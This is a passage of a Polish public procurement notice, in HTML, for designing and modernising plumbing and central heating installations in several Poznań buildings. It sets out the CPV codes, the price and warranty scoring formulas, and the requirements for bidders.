ust. 6 pkt 4 lit. a Umowy (zwana dalej Dokumentacją Powykonawczą).<br/>Wykonawca zobowiązuje się do kompleksowego wykonania i oddania przedmiotu Zamówienia, w szczególności zgodnie z zapisami Umowy, złożoną ofertą, dokumentami udostępnionymi Wykonawcy w procedurze o udzielenie zamówienia publicznego, Specyfikacją Warunków Zamówienia, zwaną dalej ,,SWZ”, a w zakresie wykonania robót zgodnie z Dokumentacją <br/>i ostateczną decyzją o pozwoleniu na budowę, zasadami wiedzy technicznej i sztuki budowlanej oraz właściwymi przepisami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45300000-0 - Roboty instalacyjne w budynkach</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">210 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą w danej części zostanie uznana oferta, która uzyska najwyższą liczbę punktów w kryterium:<br/><br/>Lp.	Opis kryterium oceny	Waga kryterium (%)<br/>I.	Cena brutto oferty 90 %<br/>II.	Okres gwarancji na wykonane roboty budowlane w miesiącach 10 %<br/>	Sposób przyznawania punktów:<br/>Kryterium I – Cena<br/>C - cena brutto oferty = maksymalnie 90 punktów<br/>Cena będzie oceniana metodą punktową wg wzoru:<br/>C=(C_min/C_bad )*90<br/>gdzie:<br/>C ilość punktów oferty badanej w kryterium cena brutto oferty,<br/>Cmin najniższa cena spośród ofert badanych niepodlegających odrzuceniu (brutto),<br/>Cbad cena oferty badanej (brutto).<br/>Podstawą przyznania punktów w kryterium „cena brutto oferty” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu ofertowym, stanowiącym załącznik nr 1 do SWZ.<br/><br/>Kryterium II – Okres gwarancji na wykonane roboty budowlane w miesiącach <br/>G – okres gwarancji na wykonane roboty budowlane w miesiącach = maksymalnie 10 punktów<br/>Gwarancja będzie oceniana metodą punktową wg wzoru:<br/>G=(G_bad/G_max )*10<br/>gdzie:<br/>G ilość punktów oferty badanej w kryterium okres gwarancji na wykonane roboty budowlane<br/>Gbad gwarancja oferty badanej<br/>Gmax najwyższa gwarancja spośród ofert badanych niepodlegających odrzuceniu (maksymalnie 60 miesięcy)<br/>Punkty przyznane w kryterium „Okres gwarancji na wykonane roboty budowlane <br/>w miesiącach ” zostaną wyliczone według poniższych zasad: (dostosować do ZP) <br/>	Minimalny okres gwarancji wynosi 36 miesięcy liczony od dnia podpisania Protokołu Odbioru Końcowego Robót. W przypadku zaoferowania przez Wykonawcę krótszego okresu gwarancji lub nie wpisaniu w formularzu ofertowym okresu udzielanej gwarancji oferta będzie podlegała odrzuceniu na podstawie art. 226 ust. 1 pkt 5 w zw. z art. 266 ustawy PZP.<br/>	Maksymalny punktowany przez Zamawiającego okres gwarancji wynosi 60 miesięcy od dnia podpisania Protokołu Odbioru Końcowego Robót. W przypadku zaoferowania przez Wykonawcę dłuższego okresu gwarancji do oceny w ramach danego kryterium Zamawiający przyjmie okres 60 miesięcy. <br/>	W przypadku gdy którykolwiek z Wykonawców zaoferuje okres gwarancji dłuższy niż 60 miesięcy Zamawiający do obliczenia punktacji wszystkich Wykonawców przyjmie maksymalny okres gwarancji (Gmax) równy 60 miesięcy.<br/>	Zamawiający dokona oceny ofert i wyboru najkorzystniejszej oferty jedynie spośród ofert niepodlegających odrzuceniu. <br/>	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>	Za najkorzystniejszą zostanie uznana oferta (spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu), która otrzyma największą łączną liczbę punktów <br/>w poszczególnych kryteriach oceny ofert. <br/>	W toku badania i oceny ofert Zamawiający może żądać od wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na wykonane roboty budowlane w miesiącach</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zaprojektowanie i wykonanie modernizacji instalacji wodno-kanalizacyjnych i centralnego ogrzewania w budynkach w Poznaniu w podziale na części, tj.:<br/>3)	Część 3 – ul. Wodna 3/4<br/>Przedmiot Zamówienia dla każdej Części obejmuje w szczególności:<br/>1)	opracowanie na podstawie Programu Funkcjonalno-Użytkowego (zwanego dalej PFU) Projektu technicznego obejmującego: specyfikację techniczną wykonania i odbioru robót oraz inne dokumenty wskazane w PFU wraz z uzyskaniem, warunków, uzgodnień i pozwoleń, niezbędnych do sporządzenia Projektu,<br/>2)	uzyskanie na podstawie Projektu technicznego, o którym mowa w pkt 1 powyżej, zaświadczenia o braku sprzeciwu właściwego organu co do zgłoszenia rozpoczęcia robót budowlanych,<br/>3)	pełnienie czynności nadzoru autorskiego nad realizacją robót, stanowiących przedmiot Umowy w zakresie sporządzonej w ramach przedmiotu Umowy Dokumentacji, zwanym dalej Nadzorem autorskim,<br/>4)	wykonanie robót na podstawie Dokumentacji oraz wykonanie dokumentacji powykonawczej, o której mowa w § 8 ust. 6 pkt 4 lit. a Umowy (zwana dalej Dokumentacją Powykonawczą).<br/>Wykonawca zobowiązuje się do kompleksowego wykonania i oddania przedmiotu Zamówienia, w szczególności zgodnie z zapisami Umowy, złożoną ofertą, dokumentami udostępnionymi Wykonawcy w procedurze o udzielenie zamówienia publicznego, Specyfikacją Warunków Zamówienia, zwaną dalej ,,SWZ”, a w zakresie wykonania robót zgodnie z Dokumentacją <br/>i ostateczną decyzją o pozwoleniu na budowę, zasadami wiedzy technicznej i sztuki budowlanej oraz właściwymi przepisami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45300000-0 - Roboty instalacyjne w budynkach</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">210 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą w danej części zostanie uznana oferta, która uzyska najwyższą liczbę punktów w kryterium:<br/><br/>Lp.	Opis kryterium oceny	Waga kryterium (%)<br/>I.	Cena brutto oferty 90 %<br/>II.	Okres gwarancji na wykonane roboty budowlane w miesiącach 10 %<br/>	Sposób przyznawania punktów:<br/>Kryterium I – Cena<br/>C - cena brutto oferty = maksymalnie 90 punktów<br/>Cena będzie oceniana metodą punktową wg wzoru:<br/>C=(C_min/C_bad )*90<br/>gdzie:<br/>C ilość punktów oferty badanej w kryterium cena brutto oferty,<br/>Cmin najniższa cena spośród ofert badanych niepodlegających odrzuceniu (brutto),<br/>Cbad cena oferty badanej (brutto).<br/>Podstawą przyznania punktów w kryterium „cena brutto oferty” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu ofertowym, stanowiącym załącznik nr 1 do SWZ.<br/><br/>Kryterium II – Okres gwarancji na wykonane roboty budowlane w miesiącach <br/>G – okres gwarancji na wykonane roboty budowlane w miesiącach = maksymalnie 10 punktów<br/>Gwarancja będzie oceniana metodą punktową wg wzoru:<br/>G=(G_bad/G_max )*10<br/>gdzie:<br/>G ilość punktów oferty badanej w kryterium okres gwarancji na wykonane roboty budowlane<br/>Gbad gwarancja oferty badanej<br/>Gmax najwyższa gwarancja spośród ofert badanych niepodlegających odrzuceniu (maksymalnie 60 miesięcy)<br/>Punkty przyznane w kryterium „Okres gwarancji na wykonane roboty budowlane <br/>w miesiącach ” zostaną wyliczone według poniższych zasad: (dostosować do ZP) <br/>	Minimalny okres gwarancji wynosi 36 miesięcy liczony od dnia podpisania Protokołu Odbioru Końcowego Robót. W przypadku zaoferowania przez Wykonawcę krótszego okresu gwarancji lub nie wpisaniu w formularzu ofertowym okresu udzielanej gwarancji oferta będzie podlegała odrzuceniu na podstawie art. 226 ust. 1 pkt 5 w zw. z art. 266 ustawy PZP.<br/>	Maksymalny punktowany przez Zamawiającego okres gwarancji wynosi 60 miesięcy od dnia podpisania Protokołu Odbioru Końcowego Robót. W przypadku zaoferowania przez Wykonawcę dłuższego okresu gwarancji do oceny w ramach danego kryterium Zamawiający przyjmie okres 60 miesięcy. <br/>	W przypadku gdy którykolwiek z Wykonawców zaoferuje okres gwarancji dłuższy niż 60 miesięcy Zamawiający do obliczenia punktacji wszystkich Wykonawców przyjmie maksymalny okres gwarancji (Gmax) równy 60 miesięcy.<br/>	Zamawiający dokona oceny ofert i wyboru najkorzystniejszej oferty jedynie spośród ofert niepodlegających odrzuceniu. <br/>	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>	Za najkorzystniejszą zostanie uznana oferta (spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu), która otrzyma największą łączną liczbę punktów <br/>w poszczególnych kryteriach oceny ofert. <br/>	W toku badania i oceny ofert Zamawiający może żądać od wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na wykonane roboty budowlane w miesiącach</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zaprojektowanie i wykonanie modernizacji instalacji wodno-kanalizacyjnych i centralnego ogrzewania w budynkach w Poznaniu w podziale na części, tj.:<br/>4)	Część 4 – ul. Wodna 23<br/>Przedmiot Zamówienia dla każdej Części obejmuje w szczególności:<br/>1)	opracowanie na podstawie Programu Funkcjonalno-Użytkowego (zwanego dalej PFU) Projektu technicznego obejmującego: specyfikację techniczną wykonania i odbioru robót oraz inne dokumenty wskazane w PFU wraz z uzyskaniem, warunków, uzgodnień i pozwoleń, niezbędnych do sporządzenia Projektu,<br/>2)	uzyskanie na podstawie Projektu technicznego, o którym mowa w pkt 1 powyżej, zaświadczenia o braku sprzeciwu właściwego organu co do zgłoszenia rozpoczęcia robót budowlanych,<br/>3)	pełnienie czynności nadzoru autorskiego nad realizacją robót, stanowiących przedmiot Umowy w zakresie sporządzonej w ramach przedmiotu Umowy Dokumentacji, zwanym dalej Nadzorem autorskim,<br/>4)	wykonanie robót na podstawie Dokumentacji oraz wykonanie dokumentacji powykonawczej, o której mowa w § 8 ust. 6 pkt 4 lit. a Umowy (zwana dalej Dokumentacją Powykonawczą).<br/>Wykonawca zobowiązuje się do kompleksowego wykonania i oddania przedmiotu Zamówienia, w szczególności zgodnie z zapisami Umowy, złożoną ofertą, dokumentami udostępnionymi Wykonawcy w procedurze o udzielenie zamówienia publicznego, Specyfikacją Warunków Zamówienia, zwaną dalej ,,SWZ”, a w zakresie wykonania robót zgodnie z Dokumentacją <br/>i ostateczną decyzją o pozwoleniu na budowę, zasadami wiedzy technicznej i sztuki budowlanej oraz właściwymi przepisami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45300000-0 - Roboty instalacyjne w budynkach</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">210 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą w danej części zostanie uznana oferta, która uzyska najwyższą liczbę punktów w kryterium:<br/><br/>Lp.	Opis kryterium oceny	Waga kryterium (%)<br/>I.	Cena brutto oferty 90 %<br/>II.	Okres gwarancji na wykonane roboty budowlane w miesiącach 10 %<br/>	Sposób przyznawania punktów:<br/>Kryterium I – Cena<br/>C - cena brutto oferty = maksymalnie 90 punktów<br/>Cena będzie oceniana metodą punktową wg wzoru:<br/>C=(C_min/C_bad )*90<br/>gdzie:<br/>C ilość punktów oferty badanej w kryterium cena brutto oferty,<br/>Cmin najniższa cena spośród ofert badanych niepodlegających odrzuceniu (brutto),<br/>Cbad cena oferty badanej (brutto).<br/>Podstawą przyznania punktów w kryterium „cena brutto oferty” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu ofertowym, stanowiącym załącznik nr 1 do SWZ.<br/><br/>Kryterium II – Okres gwarancji na wykonane roboty budowlane w miesiącach <br/>G – okres gwarancji na wykonane roboty budowlane w miesiącach = maksymalnie 10 punktów<br/>Gwarancja będzie oceniana metodą punktową wg wzoru:<br/>G=(G_bad/G_max )*10<br/>gdzie:<br/>G ilość punktów oferty badanej w kryterium okres gwarancji na wykonane roboty budowlane<br/>Gbad gwarancja oferty badanej<br/>Gmax najwyższa gwarancja spośród ofert badanych niepodlegających odrzuceniu (maksymalnie 60 miesięcy)<br/>Punkty przyznane w kryterium „Okres gwarancji na wykonane roboty budowlane <br/>w miesiącach ” zostaną wyliczone według poniższych zasad: (dostosować do ZP) <br/>	Minimalny okres gwarancji wynosi 36 miesięcy liczony od dnia podpisania Protokołu Odbioru Końcowego Robót. W przypadku zaoferowania przez Wykonawcę krótszego okresu gwarancji lub nie wpisaniu w formularzu ofertowym okresu udzielanej gwarancji oferta będzie podlegała odrzuceniu na podstawie art. 226 ust. 1 pkt 5 w zw. z art. 266 ustawy PZP.<br/>	Maksymalny punktowany przez Zamawiającego okres gwarancji wynosi 60 miesięcy od dnia podpisania Protokołu Odbioru Końcowego Robót. W przypadku zaoferowania przez Wykonawcę dłuższego okresu gwarancji do oceny w ramach danego kryterium Zamawiający przyjmie okres 60 miesięcy. <br/>	W przypadku gdy którykolwiek z Wykonawców zaoferuje okres gwarancji dłuższy niż 60 miesięcy Zamawiający do obliczenia punktacji wszystkich Wykonawców przyjmie maksymalny okres gwarancji (Gmax) równy 60 miesięcy.<br/>	Zamawiający dokona oceny ofert i wyboru najkorzystniejszej oferty jedynie spośród ofert niepodlegających odrzuceniu. <br/>	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>	Za najkorzystniejszą zostanie uznana oferta (spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu), która otrzyma największą łączną liczbę punktów <br/>w poszczególnych kryteriach oceny ofert. <br/>	W toku badania i oceny ofert Zamawiający może żądać od wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na wykonane roboty budowlane w miesiącach</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zaprojektowanie i wykonanie modernizacji instalacji wodno-kanalizacyjnych i centralnego ogrzewania w budynkach w Poznaniu w podziale na części, tj.:<br/>5)	Część 5 – ul. Ku Dębinie 1.<br/>Przedmiot Zamówienia dla każdej Części obejmuje w szczególności:<br/>1)	opracowanie na podstawie Programu Funkcjonalno-Użytkowego (zwanego dalej PFU) Projektu technicznego obejmującego: specyfikację techniczną wykonania i odbioru robót oraz inne dokumenty wskazane w PFU wraz z uzyskaniem, warunków, uzgodnień i pozwoleń, niezbędnych do sporządzenia Projektu,<br/>2)	uzyskanie na podstawie Projektu technicznego, o którym mowa w pkt 1 powyżej, zaświadczenia o braku sprzeciwu właściwego organu co do zgłoszenia rozpoczęcia robót budowlanych,<br/>3)	pełnienie czynności nadzoru autorskiego nad realizacją robót, stanowiących przedmiot Umowy w zakresie sporządzonej w ramach przedmiotu Umowy Dokumentacji, zwanym dalej Nadzorem autorskim,<br/>4)	wykonanie robót na podstawie Dokumentacji oraz wykonanie dokumentacji powykonawczej, o której mowa w § 8 ust. 6 pkt 4 lit. a Umowy (zwana dalej Dokumentacją Powykonawczą).<br/>Wykonawca zobowiązuje się do kompleksowego wykonania i oddania przedmiotu Zamówienia, w szczególności zgodnie z zapisami Umowy, złożoną ofertą, dokumentami udostępnionymi Wykonawcy w procedurze o udzielenie zamówienia publicznego, Specyfikacją Warunków Zamówienia, zwaną dalej ,,SWZ”, a w zakresie wykonania robót zgodnie z Dokumentacją <br/>i ostateczną decyzją o pozwoleniu na budowę, zasadami wiedzy technicznej i sztuki budowlanej oraz właściwymi przepisami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45300000-0 - Roboty instalacyjne w budynkach</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">210 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą w danej części zostanie uznana oferta, która uzyska najwyższą liczbę punktów w kryterium:<br/><br/>Lp.	Opis kryterium oceny	Waga kryterium (%)<br/>I.	Cena brutto oferty 90 %<br/>II.	Okres gwarancji na wykonane roboty budowlane w miesiącach 10 %<br/>	Sposób przyznawania punktów:<br/>Kryterium I – Cena<br/>C - cena brutto oferty = maksymalnie 90 punktów<br/>Cena będzie oceniana metodą punktową wg wzoru:<br/>C=(C_min/C_bad )*90<br/>gdzie:<br/>C ilość punktów oferty badanej w kryterium cena brutto oferty,<br/>Cmin najniższa cena spośród ofert badanych niepodlegających odrzuceniu (brutto),<br/>Cbad cena oferty badanej (brutto).<br/>Podstawą przyznania punktów w kryterium „cena brutto oferty” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu ofertowym, stanowiącym załącznik nr 1 do SWZ.<br/><br/>Kryterium II – Okres gwarancji na wykonane roboty budowlane w miesiącach <br/>G – okres gwarancji na wykonane roboty budowlane w miesiącach = maksymalnie 10 punktów<br/>Gwarancja będzie oceniana metodą punktową wg wzoru:<br/>G=(G_bad/G_max )*10<br/>gdzie:<br/>G ilość punktów oferty badanej w kryterium okres gwarancji na wykonane roboty budowlane<br/>Gbad gwarancja oferty badanej<br/>Gmax najwyższa gwarancja spośród ofert badanych niepodlegających odrzuceniu (maksymalnie 60 miesięcy)<br/>Punkty przyznane w kryterium „Okres gwarancji na wykonane roboty budowlane <br/>w miesiącach ” zostaną wyliczone według poniższych zasad: (dostosować do ZP) <br/>	Minimalny okres gwarancji wynosi 36 miesięcy liczony od dnia podpisania Protokołu Odbioru Końcowego Robót. W przypadku zaoferowania przez Wykonawcę krótszego okresu gwarancji lub nie wpisaniu w formularzu ofertowym okresu udzielanej gwarancji oferta będzie podlegała odrzuceniu na podstawie art. 226 ust. 1 pkt 5 w zw. z art. 266 ustawy PZP.<br/>	Maksymalny punktowany przez Zamawiającego okres gwarancji wynosi 60 miesięcy od dnia podpisania Protokołu Odbioru Końcowego Robót. W przypadku zaoferowania przez Wykonawcę dłuższego okresu gwarancji do oceny w ramach danego kryterium Zamawiający przyjmie okres 60 miesięcy. <br/>	W przypadku gdy którykolwiek z Wykonawców zaoferuje okres gwarancji dłuższy niż 60 miesięcy Zamawiający do obliczenia punktacji wszystkich Wykonawców przyjmie maksymalny okres gwarancji (Gmax) równy 60 miesięcy.<br/>	Zamawiający dokona oceny ofert i wyboru najkorzystniejszej oferty jedynie spośród ofert niepodlegających odrzuceniu. <br/>	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>	Za najkorzystniejszą zostanie uznana oferta (spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu), która otrzyma największą łączną liczbę punktów <br/>w poszczególnych kryteriach oceny ofert. <br/>	W toku badania i oceny ofert Zamawiający może żądać od wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na wykonane roboty budowlane w miesiącach</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> WRAZ Z OFERTĄ WYKONAWCA JEST ZOBOWIĄZANY ZŁOŻYĆ:<br/>1)	oświadczenia, o których mowa w Rozdziale VIII pkt 1 SWZ - załącznik nr 2 do SWZ;<br/>2)	odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji <br/>o Działalności Gospodarczej lub innego właściwego rejestru potwierdzającego, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania;<br/>3)	pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, gdy umocowanie osoby składającej ofertę nie wynika z dokumentów opisanych w pkt XII ppkt 3.2); <br/>4)	dokument stwierdzający ustanowienie przez Wykonawców wspólnie ubiegających się <br/>o zamówienie pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy).<br/>5)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie, z którego wynika, które roboty wykonają poszczególni Wykonawcy <br/>- załącznik nr 3 do SWZ (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a)	oświadczenia, o których mowa w Rozdziale VIII ust. 1 SWZ składa z ofertą każdy <br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu,<br/>b)	